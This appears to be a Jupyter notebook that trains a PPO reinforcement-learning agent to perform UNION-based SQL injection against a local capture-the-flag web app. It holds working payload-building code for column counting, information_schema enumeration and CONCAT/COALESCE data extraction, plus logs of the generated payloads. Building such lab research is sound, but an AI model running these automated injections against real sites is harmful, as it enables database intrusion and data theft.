In [198]:
Observations to implement:
    
    html length
    previous action
    current action
    state summary
    
    

SyntaxError: invalid syntax (3997373447.py, line 1)

In [199]:
import gym
from gym import spaces
import numpy as np
import numpy as np
import gym
import numpy as np
import gym
from gym import Env
from gym import spaces 
from gym.spaces import Discrete, Box
import requests
import random
import re
import stable_baselines3
import time 

from time import sleep
from stable_baselines3.common.env_checker import check_env
from stable_baselines3 import A2C, DQN, PPO

In [162]:
# Generate the information_schema.TABLES default info

information_schema_default_tables = ("innodb_table_stats", "mysql", "information_schema", "performance_schema", "sys", "setup_metrics", "setup_meters")
information_schema_columns = "information_schemaColumns.txt"

# Needs renaming to default tables from information schema
information_schema_default_columns = []

f = open(information_schema_columns)

for _ in f:
    _ = _.replace("\n","")
    information_schema_default_columns.append(_)
    
information_schema_default_columns.append("setup_metrics")
information_schema_default_columns.append("setup_meters")

In [ ]:
# 0 = add escape
# 1 = add columns
# 2 = change comment

In [194]:
flags_found = []

In [195]:
class SQLiEnv(gym.Env):
    def __init__(self):
        self.url = "http://localhost:8000/index.php" # This is the URL for the web application.   
        self.header = {'User-Agent': 'Mozilla/5.0, RL-CTF'} # A default header for interacting with web forms
        self.interaction_form_name = "email" # This is the hard coded vulnerable HTML form input
        
        self.action_space = spaces.Discrete(7)  # See above for abstract 
        
        self.observation_space = spaces.Box(low=0, high=1, shape=(20,), dtype=np.float32)
        self.numberOfActionsTotal = 0
        
        self.loseLife = False
        self.lives = 3
        
        self.log = ''
            
        
    def reset(self):
        
        print("### Resetting ###")
        
        sleep(3.5)
        
        request_new = requests.get("http://localhost:8000/new_episode.php", headers=self.header)
        
        
        print("New challenge requested")
        
        
        
        self.actionsUsed = 0
        self.totalActions = 100
        self.totalColumns = 10
        
        
        obs = np.zeros(20)
        
        self.payload = ""
        self.escape = ""
        self.union = " UNION ALL SELECT "
        self.column = ""
        self.comment = ""
        self.findTable = ""
        self.findColumn = ""
        self.HTMLRESPONSE = [""]
        self.HTMLRESPONSE[0] = ""
        
        self.validAction = ""
        self.invalidActions = 0
        
        # Column values
        self.columnsUsed = 0
        self.columns = [""]
        self.columnDict = {}
        
        # Table values
        self.tables = [""]
        self.tableUsed = 0
        self.tableChosen = self.tables[self.tableUsed]
        
        
        
        self.chosenAction = False
        self.columnsFound = False
        self.tablesFound = False
        self.columnsToUseFound = False
        self.columnsForTable = False
        self.flagFound = False
        self.outOfBounds = False 
            
        
        self.score = 0
        
        self.index = 0
        self.actionHistory = [0] * 5
        self.observationIndex = 27 # For the previous action history
        
        
        self.log = ''
        
        return self._get_obs()
    
    
    # Action Functions
    def step(self, action):
        
        done = False
        
        self.outOfBounds = False
            
        
        self.totalActions -= 1
        
        self.actionsUsed +=1
        
        self.score -=1
        
        self.chosenAction = action
        
        self.tableChosen = self.tables[self.tableUsed]
        
        # For checking payload 
        previous_payload = self.payload
        self.validAction = True
        
        print("\n")
        
        # Change escape
        if action == 0:
            if "' " not in self.escape:
                self.escape = "' "

                self.payload = self.escape + self.union + self.column + self.comment
                
                #self.score +=5
                
            else:
                self.validAction = False 
                self.payload = previous_payload
            
            
            
        
        # Add column
        if action == 1:
            
            if self.columnsFound != True:
                
                self.columnsUsed +=1

                if self.columnsUsed == 1:
                    self.column = "NULL"

                    self.payload = self.escape + self.union + self.column + self.comment


                if self.columnsUsed > 1:
                    self.column = "NULL " * self.columnsUsed
                    self.column = ','.join(self.column.split())

                    self.payload = self.escape + self.union + self.column + self.comment
                    
            else:
                self.validAction = False
                self.payload = previous_payload
        
        # Change comment
        if action == 2:
            
            if " -- c" not in previous_payload:
                self.comment = " -- c"
            
                self.payload = self.escape + self.union + self.column + self.comment
                
                #self.score +=5
                
            else:
                self.validAction = False
                self.payload = previous_payload
            
        # Find table
        if action == 3:
            
            if self.columnsFound == True:
            
                self.table = "FROM information_schema.tables"
                
                if self.columnsUsed > 1:

                    concat = 'CONCAT("##", table_name, "##"), ' 
                    nullStatement = (" NULL " * (self.columnsUsed - 1))

                    merge = ','.join(nullStatement.split())
                    merge = merge + " "
                    
                    self.column = concat + merge

                else:
                    self.column = 'CONCAT("##", table_name, "##") '
                        


                self.payload = self.escape + self.union + self.column + self.table + self.comment
                
            else:
                self.validAction = False
                self.payload = previous_payload
                
        # Action: find columns
        if action == 4:
            
            if self.tablesFound == True:
                #if self.columnsForTable == True:
                
                if self.tablesFound == True: # remove (im being lazy)
            
                    self.table = ' FROM information_schema.columns WHERE table_name = "{}" '.format(self.tableChosen)

                    if self.columnsUsed > 1:

                        concat = 'CONCAT("&&", column_name, "&&", table_name), ' 
                        nullStatement = (" NULL " * (self.columnsUsed - 1))

                        merge = ','.join(nullStatement.split())
                        merge = merge + " "

                        self.column = concat + merge

                    else:
                        self.column = 'CONCAT("&&", column_name, "&&", table_name) '



                    self.payload = self.escape + self.union + self.column + self.table + self.comment

                else:
                    self.validAction = False
                    self.payload = previous_payload
                
        # Try column values and analyse the return
        if action == 5:
            
            
            if self.columnsToUseFound == True:
                
                self.table = " FROM {}".format(self.tableChosen)
                coalesce = []
                for _ in self.columnDict[self.tableChosen]:
                    _ = 'COALESCE({}, "") '.format(_)
                    coalesce.append(_)
                    
                    
                    

                    
                coalesce1 = str(coalesce).replace("[","").replace("]","").replace("'","")
                
                coalesce2 = " CONCAT({}), ".format(coalesce1)
                
                nullStatement = (" NULL " * (self.columnsUsed - 1))
                merge = ','.join(nullStatement.split())
                merge = merge + " "
                    
                self.column = str(coalesce2) + merge

                
                self.payload = self.escape + self.union + self.column + self.table + self.comment
                
                

                
            else:
                self.validAction = False
                self.payload = previous_payload
                
        
        ### Action - Change tables
        if action == 6:
            if len (self.tables) == 1:
                self.validAction = False
                
            else:
                if not (self.tableUsed + 1) >= len(self.tables):
                    print("Changing tables to use")
                    
                    print("Previous table", self.tableChosen)
                    self.tableUsed += 1
                    
                    self.tableChosen = self.tables[self.tableUsed]
                    
                    print("New Table: ", self.tableChosen)
                    
                    
                    
                    
                    
                    self.columnsForTable = False 
                    
                    # update payload
                    
                    if "COALESCE" in self.payload:
                        self.tableChosen = self.tables[self.tableUsed]
                        
                        self.table = ' FROM "{}" '.format(self.tableChosen)
                        
                        self.payload = self.escape + self.union + self.column + self.table + self.comment
                        
                    if "column_name" in self.payload:
                        
                        
                        self.tableChosen = self.tables[self.tableUsed]
                        
                        self.table = ' FROM information_schema.columns WHERE table_name = "{}" '.format(self.tableChosen)
                        
                        
                        
                        
                
                else:
                    self.validAction = False
            
            
        
        
        
        if self.validAction != False:
            
            # Deploy exploit  
            self.exploit = {"email":"{}".format(self.payload)}
            self.HTMLRESPONSE = self._POST(self.exploit)
        
        
        # Check for tables and append dictionary
        
        if self.validAction == True:
            if action == 3:
                tablesFoundCheck = self.HTMLRESPONSE[0].count("##")
                print("TablesFoundCheck: ", tablesFoundCheck)
                if tablesFoundCheck > 2:

                    tableString = re.findall("##(.*?)##", self.HTMLRESPONSE[0])

                    for tableName in tableString:
                        
                        
                        if tableName == "":
                            pass

                        elif "table_name" in tableName:
                            pass 

                        elif "column_name" in tableName:
                            pass

                        else:
                            

                            if tableName not in information_schema_default_columns:
                                
                                self.tablesFound = True
                                
                                
                                
                                if tableName not in self.tables:
                                    if "" in self.tables:
                                        self.tables.remove("")
                                    if None in self.tables:
                                        self.tables.remove(None)
                                    self.tables.append(tableName)

                                    if tableName not in self.columnDict:
                                        self.columnDict[tableName] = []
                                        
                                        
            
                                        

        # check for columns found and append dictionary
        if self.validAction == True:
            if action == 4:
      
           
                columnString = re.findall("&&(.*?)&&", self.HTMLRESPONSE[0])
            
                columnDictKey = self.tables[self.tableUsed]
                columnDictValues = []
            
                for columnName in columnString:
                    if columnName == "":
                        pass
                
                    elif "column_name" in columnName:
                        pass

                    elif "table_name" in columnName:
                        pass
                
                    else:
                        
                        self.columnsToUseFound = True
                        
                        self.columnsForTable = True 
                    
                    
                        if columnName not in self.tables:

                            columnDictValues.append(columnName)


                            if columnName not in self.columns:
                                self.columns.append(columnName)

                            if columnDictKey in self.columnDict:
                                self.columnDict[columnDictKey] = columnDictValues

        
        # Scoring System
        if self.validAction == False:
            self.invalidActions +=1
            print("Invalid Action")
            self.score -=1
            
        if self.validAction == True:   
            if self.chosenAction == 1:
                if "' " in self.escape:
                    if " -- c" in self.comment:
                        if "NULL" in self.column:
                                if "The used SELECT statements" not in self.HTMLRESPONSE[0]:
                                    if " You have an error in your SQL syntax" not in self.HTMLRESPONSE[0]:
                                        self.columnsFound = True
                                      #  self.score +=5
        
        if self.validAction == True:
            if self.chosenAction == 3:
                if "' " in self.escape:
                    if " -- c" in self.comment:
                        if "NULL" in self.column:
                            if "The used SELECT statements" not in self.HTMLRESPONSE[0]:
                                if " You have an error in your SQL syntax" in self.HTMLRESPONSE[0]:
                                    self.columnsFound = True
                                  #  self.score +=5

        if self.validAction == True:                           
            if action == 3:
                if self.tablesFound == True:
                    #self.score +=10
                    pass
                
        if self.validAction == True:    
            if action == 4:
                if self.columnsToUseFound == True:
                    # self.score +=15
                    pass
                    
        if self.validAction == True:      
            if "COALESCE" in self.payload:
                if self.flagFound == False:
                    if action == 6:
                    #    self.score += 10
                        pass
                
                
        if self.validAction == True:        
            if "RL{" in self.HTMLRESPONSE[0]:
                print("!!!!! Flag Found !!!!!")
                self.score += 1000


                self.flagFound = True

                loggedFlag = "Y" + str(self.score) + str(self.actionsUsed)

                flags_found.append(loggedFlag)

                self.done = True

        
            
        
        
        

            
        
        reward = self.score
        
        
    
        
        print("columns used: ", self.columnsUsed, "Action: ", action, "Payload: ", self.payload, "Reward: ", reward)
            
        
        
        
        if self.totalActions == 0:
            done = True
            
        if self.columnsUsed >= self.totalColumns:
            done = True
            
            self.outofBounds = True
            
            #self.reset()
            
            
        if self.invalidActions >= 10:
            done = True
            #self.reset()
            
        return self._get_obs(), reward, done, {}
    
    
    # Observation Function
    def _get_obs(self):
        
        #obs = np.zeros(20)
        
        # Observation 0: Valid Action / No Error
        if self.validAction == True:
            obs[0] = 1
        
        # Observation 1: Escape added
        if "' " in self.payload:
            obs[1] = 1
            
        # Observation 2: comment added
        if " -- c" in self.payload:
            obs[2] = 1
            
        # Observation 3: SQLi found
        if "The used SELECT statements" in self.HTMLRESPONSE[0]:
            obs[3] = 1
            
        if " You have an error in your SQL syntax" in self.HTMLRESPONSE[0]:
            obs[3] = 1
            
        if self.columnsFound == True:
            obs[3] = 1
            
        # Observation 4 number of columns for select found
        if self.columnsFound == True:
            obs[4] = 1
        
        # Tables Found
        if self.tablesFound == True:
            obs[5] = 1
            
        # Found columns that we can use
        if self.columnsToUseFound == True:
            obs[6] = 1
            
        # If flag found
        if self.flagFound == True:
            obs[7] = 1
            
        # Observation 8 - 18 reserved for chosen table:
        
        if self.columnsUsed == 0:
            obs[8] = 1
            
        if self.columnsUsed == 1:
            obs[9] = 1
            
        if self.columnsUsed == 2:
            obs[10] = 1
            
        if self.columnsUsed == 3:
            obs[11] = 1
            
        if self.columnsUsed == 4:
            obs[12] = 1
            
        if self.columnsUsed == 5:
            obs[13] = 1
            
        if self.columnsUsed == 6:
            obs[14] = 1
            
        if self.columnsUsed == 7:
            obs[15] = 1
            
        if self.columnsUsed == 8:
            obs[16] = 1
            
        if self.columnsUsed == 9:
            obs[17] = 1
            
        if self.columnsUsed == 10:
            obs[18] = 1
            
        if self.outOfBounds == True:
            obs[19] = 1
            
        
            
            
            
            
            
            
            
            
        
        
        
        #print(obs) 
        
        return obs
   
    def _GET(self):
        try:
            # GET request using the url and custom header
            response = requests.get(self.url, headers=self.header)
            return response.text, response.status_code, len(response.text)
        except ResponseError as e:
            return e

    # This function is for the HTTP POST requests for submitting our SQL injection payloads
    def _POST(self, exploit):
        try:
            # Send the url, header and data containing the payload. This is found in the custom environment
            # Search for "exploit" in the custom environment to find this part 
            response = requests.post(self.url, headers=self.header, data=exploit)
            return response.text, response.status_code, len(response.text)
        except ResponseError as e:
            return e 
            
        
            
        #if action == 2:
        #    if self.tableStatement not in self.payload:
        #        self.payload = "{} {} {} {}".format(self.escapeStatement, self.unionStatement, self.tableStatement, self.nullStatement, self.commentStatement)
        
        return self.payload 
    
    def _normalize(self, chosenAction):
        max_val = 10
        normalized_values = chosenAction / max_val
        #print("ORIGINAL", chosenAction, "NORMALISED", normalized_values)
        return normalized_values
    
    def _normalisedTable(self):
        max_val = 10
        normalized_tables = self.tableUsed / max_val
        return normalized_tables
        

    # Function to add items to the list and maintain its size at 10
    def _addActionHistory(self, chosenAction):
        self.actionHistory[self.index] = chosenAction
        #self.index = (self.index + 1) % 10  # Update index in a circular manner
        new_item = _
        self.index +=1
        
        if self.index == 5:
            self.index = 0

    
    def flagFoundReset(self):
        if self.flagFound == True:
            flagFound = True
        else:
            flagFound = False
            
        return flagFound 
            
    def render(self, mode=None):
        print(self.log)
        self.log = ''
        
        

In [196]:
from stable_baselines3.common.env_checker import check_env
from stable_baselines3.common.env_util import make_vec_env

env = SQLiEnv()

check_env(env, warn=True)

print("Observation", env.observation_space)
print("Action Space", env.action_space)
print("Action Space Sample", env.action_space.sample())

### Resetting ###
New challenge requested


Invalid Action
columns used:  0 Action:  6 Payload:   Reward:  -2


columns used:  0 Action:  4 Payload:   Reward:  -3


columns used:  1 Action:  1 Payload:   UNION ALL SELECT NULL Reward:  -4


Invalid Action
columns used:  1 Action:  3 Payload:   UNION ALL SELECT NULL Reward:  -6


Invalid Action
columns used:  1 Action:  3 Payload:   UNION ALL SELECT NULL Reward:  -8


Invalid Action
columns used:  1 Action:  5 Payload:   UNION ALL SELECT NULL Reward:  -10


columns used:  2 Action:  1 Payload:   UNION ALL SELECT NULL,NULL Reward:  -11


columns used:  2 Action:  4 Payload:   UNION ALL SELECT NULL,NULL Reward:  -12


columns used:  3 Action:  1 Payload:   UNION ALL SELECT NULL,NULL,NULL Reward:  -13


Invalid Action
columns used:  3 Action:  5 Payload:   UNION ALL SELECT NULL,NULL,NULL Reward:  -15


columns used:  3 Action:  4 Payload:   UNION ALL SELECT NULL,NULL,NULL Reward:  -16
Observation Box([0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 

In [197]:
env = SQLiEnv()
obs = env.reset()
#env.render()

flags_found = []

model = PPO("MlpPolicy", env, verbose=1, n_steps=10000, batch_size=10000, learning_rate = 0.3).learn(10000)

### Resetting ###
New challenge requested
Using cpu device
Wrapping the env with a `Monitor` wrapper
Wrapping the env in a DummyVecEnv.
### Resetting ###
New challenge requested


columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  Reward:  -1


columns used:  0 Action:  4 Payload:  '  UNION ALL SELECT  Reward:  -2


columns used:  0 Action:  4 Payload:  '  UNION ALL SELECT  Reward:  -3


Invalid Action
columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  Reward:  -5


Invalid Action
columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  Reward:  -7


columns used:  0 Action:  2 Payload:  '  UNION ALL SELECT  -- c Reward:  -8


Invalid Action
columns used:  0 Action:  2 Payload:  '  UNION ALL SELECT  -- c Reward:  -10


Invalid Action
columns used:  0 Action:  3 Payload:  '  UNION ALL SELECT  -- c Reward:  -12


columns used:  0 Action:  4 Payload:  '  UNION ALL SELECT  -- c Reward:  -13


Invalid Action
columns used:  0 Action:  5 Payload:  '  UNION ALL SELECT  -- c R

New challenge requested


columns used:  0 Action:  4 Payload:   Reward:  -1


Invalid Action
columns used:  0 Action:  6 Payload:   Reward:  -3


columns used:  0 Action:  2 Payload:   UNION ALL SELECT  -- c Reward:  -4


Invalid Action
columns used:  0 Action:  6 Payload:   UNION ALL SELECT  -- c Reward:  -6


columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  -- c Reward:  -7


columns used:  0 Action:  4 Payload:  '  UNION ALL SELECT  -- c Reward:  -8


Invalid Action
columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  -- c Reward:  -10


Invalid Action
columns used:  0 Action:  5 Payload:  '  UNION ALL SELECT  -- c Reward:  -12


columns used:  0 Action:  4 Payload:  '  UNION ALL SELECT  -- c Reward:  -13


Invalid Action
columns used:  0 Action:  5 Payload:  '  UNION ALL SELECT  -- c Reward:  -15


Invalid Action
columns used:  0 Action:  2 Payload:  '  UNION ALL SELECT  -- c Reward:  -17


Invalid Action
columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  -

New challenge requested


Invalid Action
columns used:  0 Action:  5 Payload:   Reward:  -2


columns used:  0 Action:  2 Payload:   UNION ALL SELECT  -- c Reward:  -3


Invalid Action
columns used:  0 Action:  6 Payload:   UNION ALL SELECT  -- c Reward:  -5


columns used:  1 Action:  1 Payload:   UNION ALL SELECT NULL -- c Reward:  -6


columns used:  2 Action:  1 Payload:   UNION ALL SELECT NULL,NULL -- c Reward:  -7


Invalid Action
columns used:  2 Action:  6 Payload:   UNION ALL SELECT NULL,NULL -- c Reward:  -9


columns used:  2 Action:  0 Payload:  '  UNION ALL SELECT NULL,NULL -- c Reward:  -10


Invalid Action
columns used:  2 Action:  5 Payload:  '  UNION ALL SELECT NULL,NULL -- c Reward:  -12


Invalid Action
columns used:  2 Action:  0 Payload:  '  UNION ALL SELECT NULL,NULL -- c Reward:  -14


Invalid Action
columns used:  2 Action:  3 Payload:  '  UNION ALL SELECT NULL,NULL -- c Reward:  -16


Invalid Action
columns used:  2 Action:  3 Payload:  '  UNION ALL SELECT NULL

New challenge requested


Invalid Action
columns used:  0 Action:  5 Payload:   Reward:  -2


Invalid Action
columns used:  0 Action:  5 Payload:   Reward:  -4


columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  Reward:  -5


columns used:  0 Action:  4 Payload:  '  UNION ALL SELECT  Reward:  -6


Invalid Action
columns used:  0 Action:  5 Payload:  '  UNION ALL SELECT  Reward:  -8


Invalid Action
columns used:  0 Action:  5 Payload:  '  UNION ALL SELECT  Reward:  -10


columns used:  0 Action:  2 Payload:  '  UNION ALL SELECT  -- c Reward:  -11


columns used:  1 Action:  1 Payload:  '  UNION ALL SELECT NULL -- c Reward:  -12


Invalid Action
columns used:  1 Action:  2 Payload:  '  UNION ALL SELECT NULL -- c Reward:  -14


Invalid Action
columns used:  1 Action:  0 Payload:  '  UNION ALL SELECT NULL -- c Reward:  -16


Invalid Action
columns used:  1 Action:  6 Payload:  '  UNION ALL SELECT NULL -- c Reward:  -18


columns used:  2 Action:  1 Payload:  '  UNION ALL SELECT N

New challenge requested


columns used:  0 Action:  2 Payload:   UNION ALL SELECT  -- c Reward:  -1


columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  -- c Reward:  -2


Invalid Action
columns used:  0 Action:  6 Payload:  '  UNION ALL SELECT  -- c Reward:  -4


Invalid Action
columns used:  0 Action:  2 Payload:  '  UNION ALL SELECT  -- c Reward:  -6


Invalid Action
columns used:  0 Action:  5 Payload:  '  UNION ALL SELECT  -- c Reward:  -8


Invalid Action
columns used:  0 Action:  2 Payload:  '  UNION ALL SELECT  -- c Reward:  -10


Invalid Action
columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  -- c Reward:  -12


columns used:  0 Action:  4 Payload:  '  UNION ALL SELECT  -- c Reward:  -13


Invalid Action
columns used:  0 Action:  2 Payload:  '  UNION ALL SELECT  -- c Reward:  -15


Invalid Action
columns used:  0 Action:  6 Payload:  '  UNION ALL SELECT  -- c Reward:  -17


Invalid Action
columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  -- c Reward:

...

New challenge requested


columns used:  1 Action:  1 Payload:   UNION ALL SELECT NULL Reward:  -1


columns used:  1 Action:  2 Payload:   UNION ALL SELECT NULL -- c Reward:  -2


Invalid Action
columns used:  1 Action:  6 Payload:   UNION ALL SELECT NULL -- c Reward:  -4


Invalid Action
columns used:  1 Action:  5 Payload:   UNION ALL SELECT NULL -- c Reward:  -6


Invalid Action
columns used:  1 Action:  3 Payload:   UNION ALL SELECT NULL -- c Reward:  -8


Invalid Action
columns used:  1 Action:  3 Payload:   UNION ALL SELECT NULL -- c Reward:  -10


Invalid Action
columns used:  1 Action:  5 Payload:   UNION ALL SELECT NULL -- c Reward:  -12


columns used:  1 Action:  0 Payload:  '  UNION ALL SELECT NULL -- c Reward:  -13


Invalid Action
columns used:  1 Action:  0 Payload:  '  UNION ALL SELECT NULL -- c Reward:  -15


columns used:  1 Action:  4 Payload:  '  UNION ALL SELECT NULL -- c Reward:  -16


Invalid Action
columns used:  1 Action:  5 Payload:  '  UNION ALL SELECT NULL 

columns used:  6 Action:  4 Payload:  '  UNION ALL SELECT CONCAT("&&", column_name, "&&", table_name), NULL,NULL,NULL,NULL,NULL  FROM information_schema.columns WHERE table_name = "employees"  -- c Reward:  -55


columns used:  6 Action:  4 Payload:  '  UNION ALL SELECT CONCAT("&&", column_name, "&&", table_name), NULL,NULL,NULL,NULL,NULL  FROM information_schema.columns WHERE table_name = "employees"  -- c Reward:  -56


TablesFoundCheck:  680
columns used:  6 Action:  3 Payload:  '  UNION ALL SELECT CONCAT("##", table_name, "##"), NULL,NULL,NULL,NULL,NULL FROM information_schema.tables -- c Reward:  -57


columns used:  6 Action:  5 Payload:  '  UNION ALL SELECT  CONCAT(COALESCE(employeeNumber, "") , COALESCE(lastName, "") , COALESCE(firstName, "") , COALESCE(extension, "") , COALESCE(email, "") , COALESCE(officeCode, "") , COALESCE(reportsTo, "") , COALESCE(jobTitle, "") ), NULL,NULL,NULL,NULL,NULL  FROM employees -- c Reward:  -58


Invalid Action
columns used:  6 Action:  2 Payloa

New challenge requested


columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  Reward:  -1


Invalid Action
columns used:  0 Action:  0 Payload:  '  UNION ALL SELECT  Reward:  -3


Invalid Action
columns used:  0 Action:  3 Payload:  '  UNION ALL SELECT  Reward:  -5


columns used:  1 Action:  1 Payload:  '  UNION ALL SELECT NULL Reward:  -6


Invalid Action
columns used:  1 Action:  3 Payload:  '  UNION ALL SELECT NULL Reward:  -8


Invalid Action
columns used:  1 Action:  3 Payload:  '  UNION ALL SELECT NULL Reward:  -10


Invalid Action
columns used:  1 Action:  5 Payload:  '  UNION ALL SELECT NULL Reward:  -12


Invalid Action
columns used:  1 Action:  5 Payload:  '  UNION ALL SELECT NULL Reward:  -14


Invalid Action
columns used:  1 Action:  5 Payload:  '  UNION ALL SELECT NULL Reward:  -16


Invalid Action
columns used:  1 Action:  5 Payload:  '  UNION ALL SELECT NULL Reward:  -18


columns used:  1 Action:  4 Payload:  '  UNION ALL SELECT NULL Reward:  -19


columns used:

columns used:  4 Action:  4 Payload:  '  UNION ALL SELECT NULL,NULL,NULL,NULL -- c Reward:  -47


columns used:  4 Action:  4 Payload:  '  UNION ALL SELECT NULL,NULL,NULL,NULL -- c Reward:  -48


columns used:  5 Action:  1 Payload:  '  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL -- c Reward:  -49


Invalid Action
columns used:  5 Action:  0 Payload:  '  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL -- c Reward:  -51
### Resetting ###
New challenge requested


columns used:  0 Action:  2 Payload:   UNION ALL SELECT  -- c Reward:  -1


columns used:  1 Action:  1 Payload:   UNION ALL SELECT NULL -- c Reward:  -2


Invalid Action
columns used:  1 Action:  3 Payload:   UNION ALL SELECT NULL -- c Reward:  -4


columns used:  1 Action:  0 Payload:  '  UNION ALL SELECT NULL -- c Reward:  -5


Invalid Action
columns used:  1 Action:  6 Payload:  '  UNION ALL SELECT NULL -- c Reward:  -7


columns used:  2 Action:  1 Payload:  '  UNION ALL SELECT NULL,NULL -- c Reward:  -8


Invalid Action
columns u

KeyboardInterrupt: 

In [193]:
print(flags_found)

['Y94933', 'Y93448', 'Y193051', 'Y94042', 'Y95530', 'Y195332', 'Y95431', 'Y195332', 'Y294935', 'Y96225', 'Y94536', 'Y94539', 'Y193745', 'Y96227', 'Y95037', 'Y194938', 'Y94935', 'Y94042', 'Y95828', 'Y195630', 'Y295332', 'Y395034', 'Y94142', 'Y94041', 'Y97617', 'Y93447', 'Y94735', 'Y93943', 'Y94736', 'Y194041', 'Y293942', 'Y93744', 'Y193645', 'Y94835', 'Y194736', 'Y94042', 'Y95328', 'Y94142', 'Y93942', 'Y95728', 'Y194536', 'Y294338', 'Y95529', 'Y94737', 'Y194539', 'Y97320', 'Y94935', 'Y96225', 'Y195928', 'Y294837', 'Y394639', 'Y494441', 'Y94934', 'Y94538', 'Y93645', 'Y94240', 'Y194141', 'Y97915', 'Y197717', 'Y297419', 'Y96526', 'Y196427', 'Y296328', 'Y396031', 'Y93546', 'Y94538', 'Y194041', 'Y293942', 'Y94833', 'Y96027', 'Y94932', 'Y194833', 'Y93845', 'Y193547', 'Y293349', 'Y94242', 'Y95534', 'Y94641', 'Y93645', 'Y95132', 'Y96624', 'Y196525', 'Y294637', 'Y93746', 'Y94140', 'Y96130', 'Y195932', 'Y295038', 'Y94437', 'Y94635', 'Y94834', 'Y95332', 'Y95728', 'Y94734', 'Y95533', 'Y195335', 'Y2

In [186]:
obs = env.reset()

for i in range(1000):
    action, _states = model.predict(obs, deterministic=False)
    obs, rewards, done, info = env.step(action)
    env.render()
    
    if done == True:
        break

### Resetting ###
New challenge requested


Invalid Action
columns used:  0 Action:  5 Payload:   Reward:  -10



columns used:  0 Action:  4 Payload:   Reward:  -10



columns used:  1 Action:  1 Payload:   UNION ALL SELECT NULL Reward:  -10



columns used:  2 Action:  1 Payload:   UNION ALL SELECT NULL,NULL Reward:  -10



Invalid Action
columns used:  2 Action:  3 Payload:   UNION ALL SELECT NULL,NULL Reward:  -20



columns used:  2 Action:  2 Payload:   UNION ALL SELECT NULL,NULL -- c Reward:  -15



columns used:  3 Action:  1 Payload:   UNION ALL SELECT NULL,NULL,NULL -- c Reward:  -15



columns used:  4 Action:  1 Payload:   UNION ALL SELECT NULL,NULL,NULL,NULL -- c Reward:  -15



columns used:  4 Action:  4 Payload:   UNION ALL SELECT NULL,NULL,NULL,NULL -- c Reward:  -15



columns used:  4 Action:  4 Payload:   UNION ALL SELECT NULL,NULL,NULL,NULL -- c Reward:  -15



Invalid Action
columns used:  4 Action:  3 Payload:   UNION ALL SELECT NULL,NULL,NULL,NULL -- c Reward:  

In [ ]:
tableTest = [""]

if tableTest[0] == "":
    print("True")

In [175]:
header = {'User-Agent': 'Mozilla/5.0, RL-CTF'}

for _ in range(10):
    print(_)
    sleep(3)
    request_new = requests.get("http://localhost:8000/new_episode.php", headers=header)
    



0
1
2
3
4
5
6
7
8
9
